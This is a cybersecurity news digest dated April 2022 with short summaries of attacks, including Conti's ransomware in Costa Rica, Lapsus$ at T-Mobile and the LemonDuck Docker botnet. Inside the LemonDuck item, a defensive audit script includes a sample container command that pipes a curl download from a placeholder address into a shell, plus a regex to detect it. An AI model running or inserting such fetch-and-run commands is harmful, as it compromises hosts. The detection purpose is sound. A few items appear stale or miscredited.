Sunday, April 24, 2022 // (IG): BB //Weekly Sponsor: Philly Tech Club
Pro-Iran hackers target Israel Airports Authority website
FROM THE MEDIA: A pro-Iran hacking group calling itself "Altahrea Team" targeted the website of the Israel Airports Authority (IAA), Israeli media reported over the weekend. The IAA confirmed that the site had experienced a DDoS attack but said its operational systems and networks were unaffected.
The group said its actions were "revenge" for the assassination by the United States on Jan. 3 of Iranian Quds Force commander Qassem Soleimani and Abu Mahdi Al-Muhandes, the commander of the pro-Iranian Popular Mobilization Forces Shi'ite militias in Iraq, according to Maariv.
In a statement issued Wednesday, the IAA confirmed that its website had experienced a Distributed Denial of Service (DDoS) attack, but stated that there was no harm to its operational systems or infiltration of its networks.
On March 15, multiple Israeli government websites went offline, likely due to a large-scale cyber attack conducted by "Iranian-aligned hackers."
READ THE STORY: Israel Hayom
Costa Rican government systems are in chaos due to a cyber attack
FROM THE MEDIA: Almost a week after a ransomware attack crippled Costa Rican government computer systems, the country refused to pay a ransom as it scrambled to devise workarounds and prepared itself as hackers began leaking stolen data.
The incident was claimed by the Russian-speaking Conti gang, although the Costa Rican officials had not confirmed its source.
On Monday, the Finance Ministry was the first to report problems. A number of its systems were affected, from tax collection to the import and export processes handled by the customs agency. Attacks followed on the social security agency's human resources system, the Labor Ministry and others.
The initial attack forced the Finance Ministry to shut down for several hours the system responsible for the payment of a good part of the country’s public employees, which also handles government pension payments. It also has had to grant extensions for tax payments.
READ THE STORY: Bollyinside
The Belarusian railway workers who helped thwart Russia’s attack on Kyiv
FROM THE MEDIA: When Russian troops first streamed across the Belarusian border into Ukraine for what they had assumed would be a lightning assault on Kyiv, they were intending to rely on the region’s extensive rail network for supplies and reinforcements.
The Russians hadn’t taken into account the railway saboteurs of Belarus.
Starting in the earliest days of the invasion in February, a clandestine network of railway workers, hackers and dissident security forces went into action to disable or disrupt the railway links connecting Russia to Ukraine through Belarus, wreaking havoc on Russian supply lines.
The attacks have drawn little attention outside Belarus amid the drama of the Russian onslaught and the bloody aftermath of Russia’s humiliating retreat. Fierce Ukrainian resistance and tactical errors by an ill-prepared Russian force were likely enough to thwart Russia’s plans, analysts say.
READ THE STORY: Washington Post
Garmin’s New Aviator Watch Partly Addresses a Risk the War in Ukraine Is Highlighting – Microtargeting
FROM THE MEDIA: Late last month, electronics firm Garmin began touting its newest smartwatch for aviators, the D2 Mach 1. Aside from a host of aviation-specific features, the D2 Mach 1 has a "stealth mode" that halts GPS tracking and a "kill mode" that wipes its memory. Russia's microtargeting of Ukrainian service members via their personal devices suggests Garmin is on to something. But is it enough?
With its large 47 mm dial and high-resolution AMOLED touchscreen display, the D2 Mach 1 is impressively conspicuous, the kind of timepiece that has attracted aviators since World War I. Its direct-to navigation, pulse oximeter, GPS moving maps and NEXRAD weather radar are enticing capabilities in such a small device, multiplied greatly when the watch is Bluetooth-connected to a smartphone with Garmin’s Pilot, In-Reach or Connect apps.
Russian operatives have been collectively and individually targeting Ukrainian military service members by leveraging the data coming from apps resident on the connected devices (cell phones, tablets, computers, smart watches) they use on or near the battlefield. The practice was highlighted in a recent article for Defense News co-authored by U.S. Army Cyber Institute (ACI) researcher, Jessica Dawson, and Brandon Pugh, policy counsel for the R Street Institute’s cybersecurity and emerging threats team.
READ THE STORY: Forbes
The Ukrainians Keep Blowing Up Russian Command Posts And Killing Generals
FROM THE MEDIA: Eight years ago, a trio of Ukrainian army brigades fighting Russian-backed separatists in eastern Ukraine’s Donbas region made a fatal mistake. They idled their tanks and trucks around a static command post.
Russian drones and eavesdroppers pinpointed the command post and blasted it with artillery.
Today it’s the Russians who are making that same mistake—and the Ukrainians who are exploiting the error. In the two months since Russia widened its war on Ukraine, Kyiv’s forces have located and destroyed no fewer than 31 Russian command and communications posts.
As many as 10 Russian generals have died in combat since Russia attacked on Feb. 24, many of them in the Ukrainians' "decapitation" strikes.
READ THE STORY: Forbes
U.S. Pentagon Praises Starlink’s Resistance to Jamming, Hacking Attempts
FROM THE MEDIA: In February 2022, SpaceX sent Starlink terminals to Ukraine and activated its satellite Internet service for the country. In March 2022, it beefed up Starlink’s ability to resist jamming attempts. Now the U.S. Pentagon has praised Starlink’s ability to resist Russia’s jamming and hacking attempts.
Russia had disrupted other forms of communication during its invasion of Ukraine. SpaceX CEO Elon Musk responded on Twitter to a request for help from Mykhailo Fedorov, Ukraine's Vice Prime Minister and Minister of Digital Transformation.
Fedorov later put out a call for technological help to create a worldwide “IT Army” to help with the cyber component of its defense against Russia.
Office of the Secretary of Defense Director of Electronic Warfare Dave Tremper praised the speed at which Starlink’s tech team responded to Russia’s attacks.
Tremper called Starlink’s fast response to threats an “interesting case study” in responding to cybersecurity threats in real-time.
“Starlink had slung a line of code and had fixed it and suddenly that [line of attack] was not effective anymore,” he said at the C4ISRNet defense and military conference.
He said the Pentagon could use that kind of agility in cyber defense. A considerable amount of the modern U.S. military’s capacity depends on cyber technologies and space-based capabilities like GPS.
READ THE STORY: Red Orbit
Russian Malware Planted From Nigerian Server
FROM THE MEDIA: Russian malware planted from a server in Nigeria was used in the recent cyber attack on Oil India's (OIL) systems in Assam's Duliajan, which brought down the PSU major's network, a senior police official said on Friday.
According to newindianexpress.com, OIL's systems had yet to be fully restored 10 days after the incident. The official, who asked not to be named, told PTI that the investigation indicated the attack was carried out from overseas.
He said: “We have found that a Russian malware was used in it. And someone, individual or group, planted it from Nigeria.”
"We are working out the details and also ascertaining whether it was a planned attack or a random one that hit OIL," the official added. The attack took place on April 10 on one of the workstations of OIL's Geological and Reservoir department, but the IT department reported it on April 12.
The OIL server, network and other related services were affected as a result. The attacker demanded $7.5 million (over Rs 57 crore) in ransom through a note posted on the infected PC. When contacted, OIL spokesperson Tridiv Hazarika told PTI that several government agencies were investigating the incident.
READ THE STORY: New Telegraphing
What is Motorola Solutions cyber threat organization?
FROM THE MEDIA: Motorola Solutions, a global leader in public safety and enterprise security, has launched a cyber threat information sharing and analysis organization (ISAO) focused on public safety-related information and intelligence.
Recognized by the Federal Cybersecurity and Infrastructure Security Agency (CISA), Motorola’s Public Safety Threat Alliance is part of the government’s information-sharing initiative related to cybersecurity risks and incidents.
The Public Safety Threat Alliance enables members to analyze data from multiple sources and contribute information to the wider cybersecurity public safety community and related stakeholders.
In accordance with the 2015 Executive Order “Promoting Private Sector Cybersecurity Information Sharing”, ISAOs are groups focused on sharing information related to cybersecurity risks and incidents with membership drawing from the public and private sectors.
With the establishment of the Public Safety Threat Alliance, members will be able to share and analyze information from multiple sources to proactively contribute to a stronger cybersecurity posture for the public safety community, their constituents, and other stakeholders, including government agencies and businesses.
READ THE STORY: Technology Magazine
Spain's ombudsman to probe alleged cyber spying of Catalan figures
FROM THE MEDIA: Spain's ombudsman said on Sunday it would investigate the government's alleged spying on Catalan separatist figures during the height of the region's bid for independence, while the government announced a separate inquiry by its CNI intelligence agency.
The probes follow intense pressure on the government to explain itself after Citizen Lab, a digital rights research group at the University of Toronto, said more than 60 people linked to the Catalan separatist movement, including several MEPs, politicians, lawyers and activists, had been targeted with "Pegasus" spyware made by Israel's NSO Group.
READ THE STORY: DUO
Early Discovery of Pipedream Malware a Success Story for Industrial Security
FROM THE MEDIA: The recent discovery of a malware framework, referred to as both Pipedream and Incontroller, targeting industrial control systems (ICS) highlights what can happen when everything goes right, ICS security professionals stressed at a panel discussion hosted by the Atlantic Council on April 22.
Unlike in previous attacks, cybersecurity experts detected components of the malware, researched the attackers' techniques, and erected defenses against Pipedream before it was even deployed. In its current state, the framework can scan for and communicate with some programmable logic controllers from Schneider Electric and Omron, and can scan and profile servers that speak the OPC Unified Architecture (OPC UA) protocol.
The expertise and capabilities encapsulated in the framework point to a nation-state actor as the source, making the coordinated investigation a significant win, and the best argument for the return on investment (ROI) of cybersecurity, says Danielle Jablanski, operational technology cybersecurity strategist at Nozomi Networks and a former consultant for the US Department of Defense.
READ THE STORY: Reuters
Millions Of Android Smartphones Could Be Attacked Using A Media File
FROM THE MEDIA: Android smartphone users regularly face security threats, and this week brought a big one affecting millions of users. Because of a vulnerability in the handling of an audio format on Qualcomm and MediaTek chipsets, over 67 percent of Android smartphones were at risk of attack.
Even though the vulnerability was fixed with patches last year, millions of Android smartphones could have fallen prey to the problem before the fixes were applied.
The details come from researchers at Check Point Research this week. They found the problem in the Apple Lossless Audio Codec (ALAC), which Apple open-sourced in 2011 so that non-Apple devices could offer lossless music quality for streaming; the chipset vendors' decoders were based on that code.
READ THE STORY: News18
Cryptomining botnet targeting Docker on Linux systems
FROM THE MEDIA: LemonDuck, a well-known cryptomining botnet, is targeting Docker on Linux systems to mine digital currency, CrowdStrike has reported.
The vendor's threat research team revealed in a blog written by Manoj Ahuje that the botnet is leveraging Docker APIs exposed to the internet to run malicious containers on Linux systems.
Docker is used to build, run, and manage containerized workloads. Since it runs primarily in the cloud, a misconfigured instance can expose the Docker API to the internet, where a threat actor can use it to start a rogue container running a crypto miner.
Mike Parkin, an engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, explains that one of the main ways attackers compromise containerized environments is through misconfigurations, which just shows how many organizations are failing to follow industry best practices.
"There are tools available that can protect these environments from unauthorized use, and workload monitoring tools that can flag unusual activity," he said in an interview. "The challenge can be coordinating between the development teams and the security teams, but there are risk management tools that can handle that as well."
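The misconfiguration described above is an unauthenticated Docker API bound to a public interface; what lands through it is a container with host-level privileges and a download-and-execute command. The following is an added example, not CrowdStrike's or Docker's code, of how to check both sides of that: it audits a daemon.json for a TCP listener without client-certificate verification (the weak config beside the hardened one), and scans `docker inspect`-style records for the settings a dropped miner container typically has. All inputs are constructed inline (the hypothetical daemon.json documents, the two hypothetical container records and the 203.0.113.7 documentation-range address) so the script runs offline.

```python
"""Audit a Docker host for an exposed API and for rogue-container indicators.

Added example for this digest; it is not CrowdStrike's or Docker's code.
All inputs below are constructed for illustration.
"""
import json
import re
from typing import Dict, List

# Constructed daemon.json: API on every interface, plaintext, no client auth.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
  "tls": false
}
"""

# Constructed daemon.json: TCP only on an internal address, mutual TLS required.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tls": true,
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""

# A container started through an open API usually runs a one-liner that
# fetches a script and pipes it into a shell.
DROPPER_RE = re.compile(r"(curl|wget)\b.*\|\s*(sh|bash)\b")


def audit_daemon_config(text: str) -> List[str]:
    """Return findings for a daemon.json document (empty list if clean)."""
    cfg = json.loads(text)
    findings = []
    for h in cfg.get("hosts", []):
        if not h.startswith("tcp://"):
            continue  # unix sockets are local-only; nothing to flag here
        host, _, _port = h[len("tcp://"):].rpartition(":")
        if host in ("", "0.0.0.0", "[::]"):
            findings.append(f"API bound to all interfaces: {h}")
        if not cfg.get("tlsverify"):
            findings.append(f"TCP listener without client-certificate verification: {h}")
    return findings


def audit_container(record: Dict) -> List[str]:
    """Flag settings and commands typical of a rogue miner container."""
    findings = []
    hc = record.get("HostConfig", {})
    if hc.get("Privileged"):
        findings.append("privileged container")
    if hc.get("PidMode") == "host":
        findings.append("shares host PID namespace")
    for bind in hc.get("Binds", []):
        if bind.split(":")[0] == "/":
            findings.append(f"host root filesystem mounted: {bind}")
    cmd = " ".join(record.get("Config", {}).get("Cmd") or [])
    if DROPPER_RE.search(cmd):
        findings.append(f"download-and-execute command: {cmd}")
    return findings


# Constructed `docker inspect` records trimmed to the fields checked above.
ROGUE_CONTAINER = {
    "Name": "/suspicious",
    "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/mnt"]},
    "Config": {"Image": "alpine",
               "Cmd": ["sh", "-c", "curl -fsSL http://203.0.113.7/a.sh | sh"]},
}
BENIGN_CONTAINER = {
    "Name": "/web",
    "HostConfig": {"Privileged": False,
                   "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
}

if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(doc))
    for c in (ROGUE_CONTAINER, BENIGN_CONTAINER):
        print(c["Name"], audit_container(c))
```

On a real host, feed `audit_daemon_config` the contents of /etc/docker/daemon.json and `audit_container` the output of `docker inspect` for each running container; a listener on 0.0.0.0:2375 without `tlsverify` is exactly the exposure the botnet scans for, and a privileged container binding `/` with a curl-pipe-sh command is the shape of what it drops.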
READ THE STORY: Arnnet
Lapsus$ stole T-Mobile's source code before member arrests in March
FROM THE MEDIA: The Lapsus$ extortion group stole T-Mobile's source code in March, before police arrested seven of its more prolific members late that month. In a report published Friday and spotted by The Verge, security journalist Brian Krebs shared screenshots of private Telegram messages showing that the group targeted the carrier multiple times.
"Several weeks ago, our monitoring tools detected a bad actor using stolen credentials to access internal systems that house operational tools software," T-Mobile told Krebs. "Our systems and processes worked as designed, the intrusion was rapidly shut down and closed off, and the compromised credentials used were rendered obsolete." The company added the "systems accessed contained no customer or government information or other similarly sensitive information."
Lapsus$ initially accessed T-Mobile's internal tools by buying stolen employee credentials on sites such as Russian Market. The group then carried out a series of SIM swap attacks. That type of intrusion typically involves a hacker hijacking the target's mobile phone number by transferring it to a device in their possession. The attacker can then intercept SMS messages, including password-reset links and one-time codes for multi-factor authentication. Some Lapsus$ members tried to use their access to break into T-Mobile accounts associated with the FBI and Department of Defense but failed because of the additional verification measures tied to those accounts.
Hackers have frequently targeted T-Mobile in recent years. Last August, the company confirmed it had fallen victim to a hack that saw the personal data of more than 54 million of its customers compromised. That breach also involved SIM swap attacks and may have even seen the carrier secretly pay a third-party firm to limit the damage.
READ THE STORY: Engadget
Items of interest
US government links $622 million stolen from Axie Infinity to more Ethereum wallets
FROM THE MEDIA: U.S. Treasury Department officials have tied the North Korean hacking group Lazarus to an Ethereum wallet used in the $622 million exploit of Ronin Network, a sidechain created for the play-to-earn game Axie Infinity.
Now, three more wallet addresses have been identified by the U.S Treasury Department as being associated with the attack.
The Treasury's Office of Foreign Assets Control (OFAC) has added the wallets associated with Lazarus to its sanctions list. A significant amount of the stolen funds was sent to all three wallets in the past week from the original wallet linked to the Ronin attack.
READ THE STORY: Nairametrics
DOXXING & The Law (Video)
FROM THE MEDIA: Although doxing has been around for a while, it has become the go-to word whenever ANY information about a person is searched for and/or posted. So let's really look at doxing, the laws, what you can or can't do, and clear up any misconceptions.
OSINT: Best resources to get started // You can't hide from OSINT (Video)
FROM THE MEDIA: Want to learn OSINT? Want to learn how easy it is to find information online? Time to learn Open Source Intelligence from the best.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in the original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com